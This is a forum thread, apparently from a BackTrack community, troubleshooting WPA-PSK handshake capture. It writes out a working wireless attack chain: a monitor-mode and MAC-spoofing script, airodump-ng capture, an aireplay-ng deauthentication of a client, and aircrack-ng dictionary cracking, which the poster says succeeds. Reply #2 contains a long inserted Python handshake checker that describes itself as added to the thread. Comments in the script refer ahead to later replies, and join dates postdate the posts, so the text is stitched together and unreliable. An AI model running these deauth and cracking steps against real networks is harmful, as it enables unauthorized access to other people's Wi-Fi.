
Thread: No PSK Handshake... ever! .... Plz help!

  1. #1
    Jenkem Addict imported_wyze
    Join Date: Jul 2007
    Posts: 1,543

    No PSK Handshake... ever! .... Plz help!

    I've done this many times before on different equipment, but now I've hit some kind of invisible brick wall that hopefully someone here will be able to see....

    (I'm subbing my real [valid] macs)

    Equipment:

    WRTG54G v5 Router - WPA-PSK w/TKIP
    Firmware: DD-WRT v23 SP2 (09/15/06) micro
    Mac: AA:AA:AA:AA:AA:AA (will refer to as 'AA')

    HP Notebook - Connected Machine to WPA-PSK Network
    Winblows with ipw3945 A/B/G
    Mac: BB:BB:BB:BB:BB:BB (will refer to as 'BB')

    Sony UX280P - Attacking machine
    BT2 has an internal ipw3945, but I'm using the WUSB54GC with the RTx2500 drivers... this card/driver is working 100%
    Mac: CC:CC:CC:CC:CC:CC (will refer to as 'CC')

    I'm trying to (obviously) capture the WPA-PSK handshake between AA and BB with CC. I have done the following in my numerous attempts, only to get aircrack to tell me that there are no valid WPA handshakes in my cap file.

    Step 1:

    I run a small shell script I wrote for the CC (WUSB54GC) card, which does this:

    #!/bin/sh
    # Bring the WUSB54GC (CC) up in monitor mode with a substituted MAC.
    modprobe rt2500              # rt2500 is the PCI driver; the WUSB54GC is an rt73 USB chipset (see reply #2)
    # rausb0 is the interface the USB driver creates, not a module, so there is nothing to modprobe for it
    ifconfig rausb0 down
    macchanger --mac CC:CC:CC:CC:CC:CC rausb0
    ifconfig rausb0 up
    iwpriv rausb0 forceprism 1   # prepend Prism headers to captured frames
    iwpriv rausb0 rfmontx 1      # allow transmitting while in monitor mode
    iwconfig rausb0 mode Monitor
    iwconfig                     # confirm rausb0 reports Mode:Monitor

    After this I positively confirm that CC is in Monitor mode... I've even gone the unnecessary length a few times by running airmon-ng start 6 rausb0.

    Step 2:

    airodump-ng -c 6 -b BB:BB:BB:BB:BB:BB -w /root/psktest rausb0

    This gives me:

    CH 6 ][ BAT: 43 mins ][ Elapsed: 2 mins ][ 2007-08-08 22:37

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER

    AA:AA:AA:AA:AA:AA 79 100 1738 658 28 6 48 WPA TKIP PSK

    BSSID STATION PWR Lost Packets Probes

    AA:AA:AA:AA:AA:AA BB:BB:BB:BB:BB:BB 83 0 621 dd-wrt

    Everything is good as far as I can see thus far.

    Step 3:

    Deauth using:

    aireplay-ng -0 1 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB rausb0

    This successfully deauths BB.... I know this for sure, as I can audibly hear the annoying MSN messenger popup for unread emails I have yet to read in my inbox from 1996 after it becomes reassociated.

    *A quick note... I have tried damned near everything to get the handshake, including not associating BB with AA until after I had airodump-ng up and running in this identical setup.

    Step 4:

    aircrack-ng -w /root/all.lst -b AA:AA:AA:AA:AA:AA /root/psktest-01.cap

    Gives me: No valid WPA handshakes found.... every damn time!!! No matter how many times I deauth with aireplay or manually log off and on BB.

    For the love of God, Jahweh, Buddah, Tom Cruise, Satan, whomever.... could someone please shed some light on how to troubleshoot this...?
    dd if=/dev/swc666 of=/dev/wyze

  2. #2
    Senior Member shamanvirtuel
    Join Date: Mar 2010
    Location: Somewhere in the "Ex" human right country
    Posts: 2,988

    the problem is that you are using the wrong driver

    rt73 is known to not capture handshakes well with the native driver or the rt25xx driver

    YOU MUST USE the latest driver from aspj, 1.1.0

    * NEW: ToDS packets aren't dropped by the driver anymore. WPA handshake captures are finally possible!
    * NEW: Prism headers have been disabled (sorry...) because they seem to cause a lot of troubles.

    http://homepages.tu-darmstadt.de/~p_...-1.1.0.tar.bz2

    that's all
    I will post a module tonight....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006
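    To see what the .cap file actually holds before asking aircrack-ng about it, here is a small Python checker added to this thread as an example (it is not code from the thread, from BackTrack or from aircrack-ng). It walks a classic pcap file, strips the Prism or radiotap capture header, picks out the EAPOL-Key data frames and sorts them into handshake messages 1 to 4 per AP/client pair, then reports whether the pair is usable (M2 plus M1 or M3, which is what is needed to verify the MIC) or whether only the AP-to-client half is present, which is exactly what a driver dropping ToDS frames, as described in the reply above, would leave behind. The function names, the message-number heuristic and the sample captures (built in memory from the thread's placeholder MACs AA:.. and BB:..) are my own constructions.

```python
"""Check a .cap/.pcap file for WPA/WPA2 4-way handshake (EAPOL-Key) frames. Constructed example."""
import struct

LINKTYPE_IEEE802_11 = 105   # raw 802.11 frames
LINKTYPE_PRISM = 119        # Prism monitoring header (what "forceprism 1" adds)
LINKTYPE_RADIOTAP = 127     # radiotap header
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP, ethertype 0x888E

mac_str = lambda raw: ":".join("%02x" % b for b in raw)

def _iter_pcap(data):
    """Yield (linktype, packet) for every record of a classic pcap file."""
    magic, = struct.unpack_from("<I", data, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield linktype, data[off:off + incl_len]
        off += incl_len

def _strip_link_header(linktype, pkt):
    if linktype == LINKTYPE_IEEE802_11:
        return pkt
    if linktype == LINKTYPE_RADIOTAP:      # it_len at offset 2, little-endian
        return pkt[struct.unpack_from("<H", pkt, 2)[0]:]
    if linktype == LINKTYPE_PRISM:         # msglen at offset 4, little-endian
        return pkt[struct.unpack_from("<I", pkt, 4)[0]:]
    raise ValueError("unsupported link type %d" % linktype)

def _parse_eapol_key(frame):
    """Return (bssid, station, message 1-4) for an EAPOL-Key data frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 3 != 2 or frame[1] & 0x40:
        return None                        # too short, not a data frame, or Protected bit set
    to_ds, from_ds = frame[1] & 1, (frame[1] >> 1) & 1
    if to_ds == from_ds:                   # IBSS/WDS: not an infrastructure handshake
        return None
    bssid, sta = (frame[4:10], frame[10:16]) if to_ds else (frame[10:16], frame[4:10])
    body = frame[26 if (frame[0] >> 4) & 0x8 else 24:]   # QoS data frames add a 2-byte QoS field
    eapol = body[8:]                       # after LLC/SNAP: version, type, length, EAPOL-Key body
    if body[:8] != LLC_SNAP_EAPOL or len(eapol) < 99 or eapol[1] != 3:
        return None                        # type 3 = EAPOL-Key; 99 bytes = minimum size
    key_info, = struct.unpack_from(">H", eapol, 5)      # offsets identical for WPA and RSN
    key_data_len, = struct.unpack_from(">H", eapol, 97)
    mic, ack, install = key_info & 0x100, key_info & 0x080, key_info & 0x040
    if ack and not mic:
        msg = 1                            # AP -> STA: ANonce
    elif mic and ack and install:
        msg = 3                            # AP -> STA: ANonce, GTK, MIC
    elif mic and not ack:
        msg = 2 if key_data_len else 4     # STA -> AP: M2 carries the WPA/RSN IE, M4 is empty
    else:
        return None
    return mac_str(bssid), mac_str(sta), msg

def handshake_messages(pcap_bytes):
    """Map (bssid, station) -> set of handshake message numbers seen in the capture."""
    seen = {}
    for linktype, pkt in _iter_pcap(pcap_bytes):
        parsed = _parse_eapol_key(_strip_link_header(linktype, pkt))
        if parsed:
            seen.setdefault(parsed[:2], set()).add(parsed[2])
    return seen

def diagnose(msgs):
    """Explain the capture state; verifying the MIC needs M2 plus M1 or M3."""
    if 2 in msgs and (1 in msgs or 3 in msgs):
        return "usable handshake: messages %s" % sorted(msgs)
    if not msgs:
        return "no EAPOL-Key frames at all"
    if msgs <= {1, 3}:
        return "only AP->client (FromDS) messages %s; client->AP (ToDS) frames are missing" % sorted(msgs)
    return "incomplete handshake: messages %s" % sorted(msgs)

# --- constructed sample captures (not real traffic), thread's placeholder MACs ----
AP, STA = bytes.fromhex("AAAAAAAAAAAA"), bytes.fromhex("BBBBBBBBBBBB")

def _eapol_frame(to_ds, key_info, key_data_len):
    a1, a2 = (AP, STA) if to_ds else (STA, AP)
    hdr = bytes([0x08, 0x01 if to_ds else 0x02, 0, 0]) + a1 + a2 + AP + b"\x00\x00"
    key = (struct.pack(">BHH", 254, key_info, 32) + b"\x00" * 8 + b"\x11" * 32
           + b"\x00" * 48 + struct.pack(">H", key_data_len) + b"\x00" * key_data_len)
    return hdr + LLC_SNAP_EAPOL + struct.pack(">BBH", 1, 3, len(key)) + key

def _pcap(frames, linktype=LINKTYPE_IEEE802_11):
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    return hdr + b"".join(struct.pack("<IIII", 1186612620 + i, 0, len(f), len(f)) + f for i, f in enumerate(frames))

M1 = _eapol_frame(False, 0x0089, 0)    # Pairwise|ACK
M2 = _eapol_frame(True, 0x0109, 24)    # Pairwise|MIC, WPA IE in key data
M3 = _eapol_frame(False, 0x01C9, 24)   # Pairwise|Install|ACK|MIC
M4 = _eapol_frame(True, 0x0109, 0)     # Pairwise|MIC, no key data
IP_DATA = M2[:24] + b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"\x45" * 20   # ordinary IPv4 data frame, ignored
GOOD_CAPTURE = _pcap([M1, M2, M3, IP_DATA, M4])
BAD_CAPTURE = _pcap([M1, M3, IP_DATA])          # what a driver that drops ToDS frames leaves behind

if __name__ == "__main__":                 # real file: handshake_messages(open("/root/psktest-01.cap", "rb").read())
    for name, cap in (("good", GOOD_CAPTURE), ("bad", BAD_CAPTURE)):
        print(name, {k: diagnose(v) for k, v in handshake_messages(cap).items()})
```

    Frames with the Protected bit set are skipped on purpose: the handshake itself is sent in the clear, so a capture started after the client already had its keys installed shows nothing but encrypted data, which is the other common reason for "no valid WPA handshakes". Against the thread's own symptoms the checker would have reported messages 1 and 3 only, pointing straight at the missing ToDS half.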

  3. #3
    Junior Member
    Join Date: Jul 2007
    Posts: 30

    This is brilliant. I have the exact same hardware: the WRTG54G v5 Router - WPA-PSK w/TKIP with Firmware: DD-WRT v23 SP2 (09/15/06) micro and a USB wireless adapter running rt73 legacy drivers. I was having trouble last night trying to capture the handshake, even though I could see it in Wireshark, and this is the reason why! I look forward to your module -=Ze Frenchie=-

  4. #4
    Senior Member shamanvirtuel
    Join Date: Mar 2010
    Location: Somewhere in the "Ex" human right country
    Posts: 2,988

    ftp://ftp.berlios.de/pub/svair/rt73-ASPJ-1.1.0.tgz

    you just need to tgz2lzm it

    to install, type:

    lzm2dir rt73-ASPJ-1.1.0.lzm /

    or extract the tgz on /
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  5. #5
    Senior Member
    Join Date: Apr 2007
    Posts: 3,385

    I just put a very basic WPA/WPA2 cracking video in the tutorial section. It may help you.
    --=Xploitz=-- ®
    Remote-Exploit.orgs Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" - http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" - http://forums.remote-exploit.org/showthread.php?t=8041

  6. #6
    Jenkem Addict imported_wyze
    Join Date: Jul 2007
    Posts: 1,543

    Thank you Shaman....

    Still no luck. I'm going to see what the serial monkeys have to say about this issue...
    dd if=/dev/swc666 of=/dev/wyze

  7. #7
    Jenkem Addict imported_wyze
    Join Date: Jul 2007
    Posts: 1,543

    S U C C E S S ! ! ! : ) : ) : )

    FINALLY!!!!!!!!!!!!!!!!!!!!!!

    Shaman, you led me down the right road with the driver pb.....

    I was FINALLY able to successfully capture the handshake and crack my key with the hourly tarball (rt73-CVS)... I might actually get to bed before the sun rises now that I've solved the problem!!!
    dd if=/dev/swc666 of=/dev/wyze

  8. #8
    Moderator theprez98
    Join Date: Jan 2010
    Location: Maryland
    Posts: 2,533

    Quote Originally Posted by swc666 View Post
    Shaman, you led me down the right road with the driver pb.....
    He gets something right now and then...
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  9. #9
    Senior Member shamanvirtuel
    Join Date: Mar 2010
    Location: Somewhere in the "Ex" human right country
    Posts: 2,988

    Shaman, you led me down the right road with the driver pb.....

    He gets something right now and then...


    sorry, but my English has limits; swc666, what the hell does your sentence mean in simple words?

    prez, I don't understand either; what did I get???? and then what?????


    sorry but I'm French, so please explain simply lol....
    sorry again....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  10. #10
    Moderator theprez98
    Join Date: Jan 2010
    Location: Maryland
    Posts: 2,533

    Quote Originally Posted by shamanvirtuel View Post
    Shaman, you led me down the right road with the driver pb.....

    He gets something right now and then...


    sorry, but my English has limits; swc666, what the hell does your sentence mean in simple words?

    prez, I don't understand either; what did I get???? and then what?????


    sorry but I'm French, so please explain simply lol....
    sorry again....
    "Shaman, you led me down the right road with the driver pb....." He is acknowledging that you pointed him in the correct direction.

    "He gets something right now and then..." I was joking that occasionally you actually give someone the right answer.

    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

